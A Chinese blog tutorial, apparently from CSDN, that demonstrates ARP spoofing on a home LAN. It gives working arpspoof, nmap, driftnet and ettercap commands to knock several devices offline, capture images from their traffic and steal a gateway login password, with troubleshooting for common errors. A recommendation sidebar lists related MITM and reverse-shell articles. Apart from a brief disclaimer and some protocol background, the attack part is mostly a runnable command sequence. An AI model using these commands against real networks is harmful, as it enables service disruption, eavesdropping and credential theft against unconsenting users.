ARP欺骗的艺术 | 断网与监听

置顶 已于 2022-09-27 06:38:06 修改
阅读量2.1k 收藏 35
点赞数 9
分类专栏: 网络安全 文章标签: 网络 网络安全
于 2022-09-04 12:31:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51191308/article/details/126687918
版权

0x00 免责声明

        本文仅限于学习讨论与技术知识的分享,不得违反当地国家的法律法规。对于传播、利用文章中提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本文作者不为此承担任何责任,一旦造成后果请自行承担!

0x01 前言

        ARP 欺骗是针对以太网地址解析协议的一种攻击技术,通过欺骗局域网内访问者 PC 的网关 MAC 地址,使访问者 PC 错以为攻击者更改后的 MAC 地址是网关的 MAC ,导致网络不通。此种攻击可让攻击者获取局域网上的数据包甚至可篡改数据包,且可让网络上特定计算机或所有计算机无法正常连线。

0x02 ARP欺骗原理

       ARP 协议是地址解析协议, ARP 协议的基本功能是通过目标 IP 来查询目标计算机的 MAC 地址,从而实现各个主机间流畅稳定的通信。因为早期的网络环境主机间是互相信任的。因此有人发现了 ARP 协议的设计缺陷利用 ARP 欺骗进行非法攻击。

       目标主机接收到应答包之后并不会去验证是否发送过对应的请求包,却直接使用了通过 ARP 欺骗伪造的信息替换了本地 ARP 缓存表中 IP 地址与 MAC 地址的对应关系。

ARP欺骗过程图

       如果一个计算机需要和另一个计算机相互通信,那么需要相互知道互相的 MAC 地址,需要告诉对方这个数据帧的来历。然而目标 MAC 地址是通过 ARP 地址解析协议获得。 ARP 欺骗就是通过伪造 IP 地址和 MAC 地址实现的,在计算机网络中发出大量的 ARP 请求包来阻塞网络通信,出现多个 IP 地址共用一个 MAC 地址的情况。

0x03 环境说明

kali-linux虚拟机(192.168.1.9)
windows 11笔记本(192.168.1.2)
ipad mini6平板(192.168.1.8)
redmi k40手机(192.168.1.4)
vivo Y30手机(192.168.1.5)
huawei 8手机(192.168.1.10)

0x04 准备工作

        文中使用 kali-linux 系统在虚拟机桥接网络的环境下进行示范。为什么不使用 NAT 模式:

        NAT 模式下,虚拟机仅仅可以同路由器下网段中的一台真实机通讯,而这台真实机就是安装虚拟机的这台电脑,之所以可以通讯是因为这台电脑本身充当了虚拟机的路由器,采用 NAT 模式时,虚拟机和实体机交互并不是直接进行的。

查看Kali-linux虚拟机的IP地址

ip addr

查看Kali-linux虚拟机的网关地址

route -n

0x05 断网攻击

使用Nmap扫描192.168.1.1/24网段上有哪些主机是存活的

nmap -sP 192.168.1.1/24

安装dsniff工具集

apt install dsniff

使用arpspoof工具分别对目标IP实施arp欺骗

arpspoof -i eth0 -t 192.168.1.4 192.168.1.1    #-- -t 目标IP 目标网关 -i 网卡名 --
arpspoof -i eth0 -t 192.168.1.2 192.168.1.1
arpspoof -i eth0 -t 192.168.1.5 192.168.1.1
arpspoof -i eth0 -t 192.168.1.8 192.168.1.1
arpspoof -i eth0 -t 192.168.1.10 192.168.1.1

关于可能会遇到的Error:

ErrorⅠ:arpspoof: libnet_check_iface() ioctl: No such device

翻译:嗅探:libnet_check_iface()操作接口:没有这样的设备

问题原因:网卡名称错误

解决方法:使用 ip addr ifconfig 重新检查网卡名称,一般情况下网卡名称为 eth0

ErrorⅡ:arpspoof: couldn’t arp for host 192.168.1.X

翻译:嗅探:无法对主机 192.168.1.X 进行 arp 欺骗

问题原因:1.IP无法互通

                  2.IP不在同一网段

                  3.IP地址错误

解决方法:使用 ping 命令检查目标IP是否能够互通,使用 ip addr ifconfig 重新检查网卡名称,重新使用 nmap 扫描端口存活主机状态。

目标IP访问百度查看状态,发现均无法访问百度页面

 windows 11笔记本

 ipad mini6平板

 redmi k40手机
vivo Y30手机
huawei 8手机

0x06 持续监听-图片截取

        ARP 攻击可让攻击者获取局域网上的数据包甚至可篡改数据包,那么攻击者可以通过开启端口转发,实现对目标 IP 的持续监听。

开启端口转发

echo 1 > /proc/sys/net/ipv4/ip_forward    #--开启端口转发--
echo 0 > /proc/sys/net/ipv4/ip_forward    #--关闭端口转发--

继续使用arpspoof工具实施arp欺骗,这里需要互换目标IP与目标网关

arpspoof -i ech0 -t 192.168.1.1 192.168.1.4

下载driftnet工具,获取数据流中的图片

apt install driftnet

使用driftnet获取目标IP数据流中的图片并保存到源目录

driftnet -i eth0 -a -d /usr/local/src

使用目标IP设备访问360漏洞云,发现源目录中自动下载了360漏洞云的logo

redmi k40手机
kali-linux虚拟机

 分别对平板以及笔记本进行持续监听,这里平板模拟受害者使用微信,笔记本则播放QQ音乐

演示环境: ipad mini6平板

 ipad mini6平板
kali-linux虚拟机

演示环境: windows11 笔记本

windows11 笔记本
kali-linux虚拟机

 0x07 持续监听-密码获取

 Ⅰ继续使用arpspoof工具实施arp欺骗

arpspoof -i eth0 -t 192.168.1.2 192.168.1.1

使用ettercap工具提前对目标IP的数据进行监听

ettercap -Tq -i eth0

在windows11笔记本模拟登录电信智能网关

查看ettercap生成的结果,发现用户名和密码都被窃取

0x09 总结

由于作者水平有限,文中若有错误与不足欢迎留言,便于及时更正。

尼泊罗河伯
关注
  • 9
    点赞
  • 35
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 6
    评论
专栏目录
ensp加kali实现arp欺骗攻击
04-21
使用arpspoof实现流量窃取与断网攻击
渗透测试实战之ARP欺骗攻击(ARP断网攻击和流量转发)
z_s_s_f的博客
12-17 2046
抓取图片以及http、https协议的用户名和密码,使用arpspoof、sslstrip、driftnet和ettercap这四个工具他们的关系与执行顺序是什么样的。
网络安全专栏——局域网arp断网攻击
MZH
11-14 7151
本次实验主要是通过虚拟机上的ARP攻击使得自己的本机无法上网。 ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。
计算机病毒与防护:ARP欺骗.ppt
06-10
ARP Cache 在安装了以太网网络适配器(即网卡)或TCP/IP协议的计算机中,都有ARP Cache用来保存IP地址以及解析的MAC地址。 Windows系统默认的ARP缓存表的生存时间是120秒,最大生命期限是10分钟 ARP工作原理 aa:aa:aa:aa:aa:aa bb:bb:bb:bb:bb:bb cc:cc:cc:cc:cc:cc ARP Request Who has Who has Internet地址 物理地址 bb:bb:bb:bb:bb:bb 这个ARP request和我有关系 这个ARP request和我没关系 收到ARP reply,我会缓存起来! Internet地址 物理地址 aa:aa:aa:aa:aa:aa ARP协议实现的特点 ARP欺骗的工作原理 aa:aa:aa:aa:aa:aa bb:bb:bb:bb:bb:bb cc:cc:cc:cc:cc:cc 攻击对象 ARP欺骗的攻击者 Internet地址 物理地址 aa:aa:aa:aa:aa:aa ARP reply is at cc:cc:cc:cc:cc:cc 收到ARP reply
使用JAVA通过ARP欺骗类似P2P终结者实现数据封包监听
09-05
目前网络上类似P2P终结者这类软件,主要都是基于ARP欺骗实现的,网络上到处都有关于ARP欺骗的介绍,不过为了本文读者不需要再去查找,我就在这里大概讲解一下
ARP欺骗工具arpspoof的用法
热门推荐
who_im_i的博客
09-11 2万+
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
ARP攻击--(ArpSpoof 欺骗工具)
m0_62665450的博客
11-10 5559
ArpSpoof --(ARP欺骗工具) 实现中间人攻击
arpspoof渗透工具使用方法详解+实战
请大家直接把问题写在评论区或留言,不要只说一句"你好 或 在吗",我会尽快回复的。
03-26 2万+
需求太奇葩!arpspoof渗透工具使用方法
arpspoof使用教程,Kali arp欺骗断网攻击,充当中间人转发数据包
undefine
12-12 1万+
地址解析协议,即ARP(Address Resolution Protocol),是根据IP地址 获取物理地址(MAC地址)的一个TCP/IP协议。 主机发送信息时将包含目标IP地址的ARP请求广播到局域网络上的所有主机,并接收返回消息,以此确定目标的物理地址;收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间,下次请求时直接查询ARP缓存以节约资源。 地址解析协议是建立在网络中各个主机互相信任的基础上的,局域网络上的主机可以自主发送ARP应答消息,其他主机收到应答报文时不会检测
利用arpspoof 实现断网攻击和中间人(MITM)攻击
T159558556的博客
03-21 768
ArpSpoof 是一款进行局域网arp欺骗工具,Kali linux中自带了该工具,也可以自行安装。ARP断网攻击发生在局域网,目标主机和攻击机处于同一局域网,二者互相ping通。
基于ARP欺骗网络监听分析与研究
01-12
基于ARP欺骗网络监听的危害性与隐蔽性高,私人信息极易容易泄露并严重影响网络传输效果的现状,通过详细地对ARP欺骗原理、种类与检测方法进行分析与研究,阐述了ARP欺骗的实施特点,采用ARP攻击软件对网络中的主机进行ARP欺骗的仿真实验,经过实验过程以及Wireshark嗅探工具的详细分析,得出了ARP欺骗网络监听方式在不影响用户通信的情况下,能轻松够窃取用户主机的传输信息的结果,表明ARP欺骗的危害性与隐蔽性强的结论,并进一步给出对ARP欺骗的有效防范方法。
什么是ARP欺骗ARP欺骗现象是什么?如何判断ARP欺骗
10-01
因为在进行通信的时候,数据是通过MAC地址与IP地址的对应关系来进行转发的。若其中MAC地址与IP地址对应的关系出错,就会导致数据错误转发,影响正常通信。通过某种手段,来更改MAC与IP地址的对应关系,导致电脑无法正常上网,这就是ARP欺骗
kali---arpspoof局域网断网攻击arpspoof: couldn't arp for host
weixin_33935505的博客
09-04 5110
fping -asg 192.168.0.100/24 查看局域网中存活的主机 先ping一下目标主机,看是否ping得通 要攻击需要知到目标ip,网关(网关是啥?),本机网卡(eth0)。 arpspoof -i eth0 -t 目标IP 网关 ps:如果出现arpspoof: couldn't arp for host ,要把虚拟机设置成桥接,或者关闭目标防火墙。 ...
ARP 攻击神器:ARP Spoof 保姆级教程
最新发布
Flag少侠的博客
04-24 708
arpspoof是一种网络工具,用于进行ARP欺骗攻击。它允许攻击者伪造网络设备的MAC地址,以欺骗其他设备,并截获其通信。arpspoof工具通常用于网络渗透测试和安全评估,以测试网络的安全性和漏洞。以下是arpspoof工具的一些特点和用法:1. 支持ARP欺骗攻击:arpspoof工具可以伪造ARP响应,欺骗目标设备将其通信流量发送到攻击者的设备上,从而截获通信数据。
arpspoof: libnet_check_iface() ioctl: No such device 解决方法
平人的博客
01-28 5022
arpspoof -t 目标主机 目标网关 -i 网卡 使用dsniff进行arp攻击时,出现: arpspoof: libnet_check_iface() ioctl: No such device 说明网卡名写错了 ifconfig 查看网卡名,使用有本机ip的那一个网卡名。
ARP欺骗ARP spoofing)网络攻击实验
EnerY3的博客
12-11 1749
ARP欺骗的原理基于地址解析协议(ARP)的工作方式。在TCP/IP网络中,当一个设备需要与另一个设备通信时,它首先需要知道对方的物理(MAC)地址。ARP协议通过将IP地址映射到MAC地址来解决这个问题。以下是ARP欺骗的基本步骤:1. 攻击者C监听网络上的ARP流量。2. 当设备A发出ARP请求时,攻击者C也发送一个ARP响应,声称自己是设备B(使用设备B的IP地址,但提供的是攻击者C的MAC地址)。3.设备A接收到两个响应:一个是真正的设备B的响应,另一个是攻击者C的伪造响应。
ARP--利用arpspoof和driftnet工具进行arp欺骗
mr__sheng的博客
03-26 7668
实验目的: 1.了解ARP欺骗的原理。 2.对ARP欺骗进行进一步的认识并提出防范措施。 3. 掌握熟悉arpspoof和driftnet的使用方法。 任务与要求: 1、利用arpspoof进行ARP断网攻击 2.利用arpspoof工具和driftnet工具进行ARP欺骗 原理: ARP(Address Resolution Protocol)是地址解析协议,是一种将IP地址转化成物理地址的协议。从IP地址到物理地址的映射有两种方式:表格方式和非表格方式。ARP具体说来就...
中间人攻击(ARPspoof
qq_43734081的博客
11-16 2281
中间人攻击(ARPspoof) 1.介绍: 中间人攻击(Man-in-the-MiddleAttack,简称“MITM攻击”)是一种“间接”的入侵攻击,这种攻击模式是通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接中的两台通信计算机之间,这台计算机就称为“中间人”。 2.简介 中间人攻击(Man-in-the-Middle Attack, MITM)是一种由来已久的网络入侵手段,并且当今仍然有着广泛的发展空间,如SMB会话劫持、DNS欺骗等攻击都是典型的MITM攻击。简而言之,所谓的MI
网络安全之反弹Shell
小飞的博客
04-12 1659
网络安全和渗透测试领域,“正向Shell”(Forward Shell)和"反向Shell"(Reverse Shell)是两种常用的技术手段,用于建立远程访问目标计算机的会话。这两种技术都可以让攻击者在成功渗透目标系统后执行命令,但它们在建立连接的方式上有所不同。
arp欺骗断网攻击区别
07-27
ARP欺骗(Address Resolution Protocol spoofing)和断网攻击是两种不同类型的网络攻击。 ARP欺骗是一种利用ARP协议的漏洞来欺骗网络中其他设备的攻击方式。在一个以太网中,设备通过ARP协议将IP地址映射到MAC地址,以便进行通信。攻击者可以发送伪造的ARP响应消息,将自己的MAC地址与目标IP地址进行映射,从而欺骗网络中的其他设备将数据发送到攻击者的设备上。这样,攻击者可以窃取通信数据、进行中间人攻击等。 断网攻击是一种使目标设备无法正常访问网络的攻击方式。攻击者可以通过多种手段实现断网攻击,比如发送大量无效数据包、使用网络拥塞、发起拒绝服务(DoS)攻击等。这些攻击会导致目标设备无法正常接收或发送网络数据,从而使其与网络断开连接。 总结来说,ARP欺骗是一种通过欺骗其他设备来窃取通信数据的攻击方式,而断网攻击是一种通过各种手段使目标设备与网络断开连接的攻击方式。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

尼泊罗河伯

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值